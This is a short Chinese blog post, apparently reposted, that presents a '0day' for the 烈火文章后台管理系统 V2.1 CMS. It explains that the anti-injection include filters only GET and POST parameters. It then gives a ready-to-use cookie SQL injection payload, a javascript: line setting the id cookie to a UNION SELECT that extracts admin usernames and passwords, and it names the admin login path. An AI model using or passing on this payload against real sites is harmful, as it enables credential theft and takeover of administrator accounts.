By:暗月式
今天无聊就找了个简单的系统来分析学习,首先打开 article.asp 见如此语句:
以下是引用片段: |
■ > |
随即看上内容:
直接打开:Check_SqlIn.asp。
以下是引用片段:
'SQL通用防注入程序,只需要在conn.asp之类的打开数据库文件之前引用这个页面即可 |
很明显只是过滤 get 和 post,存在 cookies 注入,附上 Exp:
javascript:alert(document.cookie="id="+escape("95 and 1=2 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin"));
后台地址:admin/admin_login.asp。
文章来源于lcx.cc:烈火文章后台管理系统 V2.1 0day
相关推荐: 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息
揭露一个灰机退改签的诈骗...... Airbasic (?????????????????????????) | 2014-03-07 12:40 +85264504508 [短信] 告知我[我替朋友在淘宝买票]:飞机因故取消,退改签致电 400-89549…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论